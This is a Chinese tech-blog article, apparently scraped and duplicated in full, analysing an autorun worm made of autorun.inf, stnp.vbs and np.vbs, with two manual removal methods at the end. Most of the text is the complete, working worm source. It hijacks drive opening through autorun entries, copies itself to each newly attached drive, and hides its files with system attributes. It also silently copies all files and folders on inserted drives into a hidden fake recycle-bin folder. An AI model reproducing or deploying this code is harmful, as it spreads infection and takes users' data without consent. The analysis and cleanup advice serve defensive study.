最新恶意复制型病毒autorun.inf,stNP.VBS,NP.VBS代码简单解析和解决方法
程序员文章站
2022-06-23 21:05:01
最新恶意复制型病毒autorun.inf,stnp.vbs,np.vbs 及代码分析与病毒处理两种方法 方法一:来自于指间轻舞 此病毒最大的特点在于中毒后,自动感染你的硬盘...
最新恶意复制型病毒autorun.inf,stnp.vbs,np.vbs
及代码分析与病毒处理两种方法
方法一:来自于指间轻舞
此病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。
下面是病毒的代码分析 文件总共有三个 都很简单,已经加上了注解。
文件名:autorun.inf
[autorun]
open=
shell\open=打开(&o)
shell\open\command=wscript.exe stnp.vbs
shell\open\default=1
shell\explore=资源管理器(&x)
shell\explore\command=wscript.exe stnp.vbs
文件名:stnp.vbs
功能是检测np.vbs是否存在,存在则运行
on error resume next
set fso = createobject("scripting.filesys"&"temobject")
if fso.fileexists("np.vbs") = -1 then
if fso.fileexists("d:\np.vbs") = -1 then
set f = fso.getfile("d:\np.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "np.vbs", "d:\np.vbs", true
set wshshell = wscript.createobject("wscript.shell")
wshshell.run "d:\np.vbs"
end if
文件名:np.vbs
-----
'[natruepark]
'容错语句
on error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = createobject("scripting.file"&"systemobject")
set wshshell = wscript.createobject("wscript.shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="c"
'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
scan_disk()
if judge_new_disk() = 1 then
dim left_n
left_n = 1
do while left_n<=(new_n-old_n)
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
if fso.fileexists(new_disk&"np.vbs") = -1 then
else
self_copy(new_disk)
end if
add_attrib(new_disk&"np.vbs")
if fso.fileexists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
if fso.fileexists(new_disk&"stnp.vbs") = -1 then
else
add_stnp(new_disk)
end if
add_attrib(new_disk&"stnp.vbs")
'-----------------</维护块>-----------------
'-----------------<功能块>-----------------
dim rec
rec = "d:\recyc1ed\"
if fso.folderexists(rec) = -1 then
else
fso.createfolder(rec)
end if
add_attribf(rec)
if fso.fileexists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
aim_folder = rec&date()&rnd()
if fso.folderexists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
'查找"汽轮机原理文件夹并复制"
if fso.folderexists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
'通用复制
if old_n = 0 then
else
set fp = fso.getfolder(new_drs(new_n)&":\")
set fc = fp.subfolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------</功能块>-----------------
left_n=left_n+1
loop
copy_disk()
end if
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
dim d, dr
new_n = -1
set dr = fso.drives
for each d in dr
if d.isready then
new_n=new_n+1
redim preserve new_drs(new_n)
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"np.vbs"
mid_path = "c:\np.bin"
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
set temp = fso.createtextfile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&o)"
temp.writeline "shell\open\command=wscript.exe stnp.vbs"
temp.writeline "shell\open\default=1"
temp.writeline "shell\explore=资源管理器(&x)"
temp.writeline "shell\explore\command=wscript.exe stnp.vbs"
temp.close
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.createtextfile("c:\d.bin",true)
temp.writeline "[.shellclassinfo]"
temp.writeline "clsid={645ff040-5081-101b-9f08-00aa002f954e}"
temp.close
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stnp.vbs
function add_stnp(folder)
dim path
set fso = createobject("scripting.file"&"systemobject")
path = folder&"stnp.vbs"
set temp = fso.createtextfile("c:\s.bin",true)
temp.writeline "on error resume next"
temp.writeline "set fso = createobject("&chr(34)&"scripting.filesys"&chr(34)&"&"&chr(34)&"temobject"&chr(34)&")"
temp.writeline "if fso.fileexists("&chr(34)&"np.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.fileexists("&chr(34)&"d:\np.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\np.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"np.vbs"&chr(34)&", "&chr(34)&"d:\np.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"wscript.shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\np.vbs"&chr(34)
temp.writeline "end if"
temp.close
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
wscript.echo("thank you!!")
wscript.quit
病毒好像有点良心 不会感染c盘,所以解决的方法还是有的:用资源管理器打开c盘,然后在左边展开其他盘符,在工具-文件夹-查看中去掉隐藏受保护的系统文件的钩并选择查看所有文件。将各个盘符隐藏的以上三个文件删除,重新启动即可。
方法二:作者刚成功操作得出
只需要进入winpe之后,查找np.vbs就可以连stnp.vbs全部查处,删除这些恶魔,即可!!!
及代码分析与病毒处理两种方法
方法一:来自于指间轻舞
此病毒最大的特点在于中毒后,自动感染你的硬盘根目录,并复制病毒文件。无论你是采用双击,还是右键选择打开,或者运行资源管理器都会自动运行其代码(病毒),所以中此病毒后,新手往往打不开盘符,导致数据无法读取。
下面是病毒的代码分析 文件总共有三个 都很简单,已经加上了注解。
文件名:autorun.inf
复制代码 代码如下:
[autorun]
open=
shell\open=打开(&o)
shell\open\command=wscript.exe stnp.vbs
shell\open\default=1
shell\explore=资源管理器(&x)
shell\explore\command=wscript.exe stnp.vbs
文件名:stnp.vbs
功能是检测np.vbs是否存在,存在则运行
复制代码 代码如下:
on error resume next
set fso = createobject("scripting.filesys"&"temobject")
if fso.fileexists("np.vbs") = -1 then
if fso.fileexists("d:\np.vbs") = -1 then
set f = fso.getfile("d:\np.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "np.vbs", "d:\np.vbs", true
set wshshell = wscript.createobject("wscript.shell")
wshshell.run "d:\np.vbs"
end if
文件名:np.vbs
-----
复制代码 代码如下:
'[natruepark]
'容错语句
on error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = createobject("scripting.file"&"systemobject")
set wshshell = wscript.createobject("wscript.shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="c"
'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
scan_disk()
if judge_new_disk() = 1 then
dim left_n
left_n = 1
do while left_n<=(new_n-old_n)
new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
if fso.fileexists(new_disk&"np.vbs") = -1 then
else
self_copy(new_disk)
end if
add_attrib(new_disk&"np.vbs")
if fso.fileexists(new_disk&"autorun.inf") = -1 then
del_attrib(new_disk&"autorun.inf")
end if
add_autorun(new_disk)
add_attrib(new_disk&"autorun.inf")
if fso.fileexists(new_disk&"stnp.vbs") = -1 then
else
add_stnp(new_disk)
end if
add_attrib(new_disk&"stnp.vbs")
'-----------------</维护块>-----------------
'-----------------<功能块>-----------------
dim rec
rec = "d:\recyc1ed\"
if fso.folderexists(rec) = -1 then
else
fso.createfolder(rec)
end if
add_attribf(rec)
if fso.fileexists(rec&"desktop.ini") = -1 then
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
aim_folder = rec&date()&rnd()
if fso.folderexists(aim_folder) = -1 then
else
fso.createfolder(aim_folder)
end if
'查找"汽轮机原理文件夹并复制"
if fso.folderexists(new_disk&"汽轮机原理") = -1 then
fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
add_attribf(aim_folder)
end if
'通用复制
if old_n = 0 then
else
set fp = fso.getfolder(new_drs(new_n)&":\")
set fc = fp.subfolders
for each f in fc
fso.copyfolder f&"", aim_folder&"\"&f.name, true
next
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
add_attribf(aim_folder)
end if
'-----------------</功能块>-----------------
left_n=left_n+1
loop
copy_disk()
end if
wscript.sleep(10000)
i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
dim d, dr
new_n = -1
set dr = fso.drives
for each d in dr
if d.isready then
new_n=new_n+1
redim preserve new_drs(new_n)
new_drs(new_n)=d.driveletter
end if
next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
if new_n = old_n then
judge_new_disk = 0
elseif new_n < old_n then
redim preserve old_drs(new_n)
old_n = new_n
judge_new_disk = 0
elseif new_n > old_n then
redim preserve old_drs(new_n)
judge_new_disk = 1
end if
end function
'复制新驱动器表单
function copy_disk()
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件属性
function del_attrib(file)
set f = fso.getfile(file)
if f.attributes = 7 then
f.attributes = 0
else
end if
end function
'自我复制到指定文件目录
function self_copy(folder)
dim aim_path, mid_path, self_file, mid_file
aim_path = folder&"np.vbs"
mid_path = "c:\np.bin"
set self_file = fso.opentextfile(wscript.scriptfullname,1)
self = self_file.readall
set mid_file = fso.opentextfile(mid_path,2,true)
mid_file.write self
mid_file.close
set mid_file = fso.getfile(mid_path)
mid_file.copy(aim_path)
mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
dim path
path = folder&"autorun.inf"
set temp = fso.createtextfile("c:\a.bin",true)
temp.writeline "[autorun]"
temp.writeline "open="
temp.writeline "shell\open=打开(&o)"
temp.writeline "shell\open\command=wscript.exe stnp.vbs"
temp.writeline "shell\open\default=1"
temp.writeline "shell\explore=资源管理器(&x)"
temp.writeline "shell\explore\command=wscript.exe stnp.vbs"
temp.close
set cop = fso.getfile("c:\a.bin")
cop.copy(path)
cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
dim path
path = folder&"desktop.ini"
set temp = fso.createtextfile("c:\d.bin",true)
temp.writeline "[.shellclassinfo]"
temp.writeline "clsid={645ff040-5081-101b-9f08-00aa002f954e}"
temp.close
set cop = fso.getfile("c:\d.bin")
cop.copy(path)
cop.delete(true)
end function
'增加stnp.vbs
function add_stnp(folder)
dim path
set fso = createobject("scripting.file"&"systemobject")
path = folder&"stnp.vbs"
set temp = fso.createtextfile("c:\s.bin",true)
temp.writeline "on error resume next"
temp.writeline "set fso = createobject("&chr(34)&"scripting.filesys"&chr(34)&"&"&chr(34)&"temobject"&chr(34)&")"
temp.writeline "if fso.fileexists("&chr(34)&"np.vbs"&chr(34)&") = -1 then"
temp.writeline "if fso.fileexists("&chr(34)&"d:\np.vbs"&chr(34)&") = -1 then"
temp.writeline "set f = fso.getfile("&chr(34)&"d:\np.vbs"&chr(34)&")"
temp.writeline "if f.attributes = 0 then"
temp.writeline "else"
temp.writeline "f.attributes = 0"
temp.writeline "end if"
temp.writeline "f.delete(true)"
temp.writeline "end if"
temp.writeline "fso.copyfile "&chr(34)&"np.vbs"&chr(34)&", "&chr(34)&"d:\np.vbs"&chr(34)&", true"
temp.writeline "set wshshell = wscript.createobject("&chr(34)&"wscript.shell"&chr(34)&")"
temp.writeline "wshshell.run "&chr(34)&"d:\np.vbs"&chr(34)
temp.writeline "end if"
temp.close
set cop = fso.getfile("c:\s.bin")
cop.copy(path)
cop.delete(true)
end function
'添加指定文件夹属性
function add_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 7 then
else
f.attributes = 7
end if
end function
'删除指定文件夹属性
function del_attribf(folder)
set f = fso.getfolder(folder)
if f.attributes = 0 then
else
f.attributes = 0
end if
end function
wscript.echo("thank you!!")
wscript.quit
病毒好像有点良心 不会感染c盘,所以解决的方法还是有的:用资源管理器打开c盘,然后在左边展开其他盘符,在工具-文件夹-查看中去掉隐藏受保护的系统文件的钩并选择查看所有文件。将各个盘符隐藏的以上三个文件删除,重新启动即可。
方法二:作者刚成功操作得出
只需要进入winpe之后,查找np.vbs就可以连stnp.vbs全部查处,删除这些恶魔,即可!!!
上一篇: WMI 脚本高手不完全手册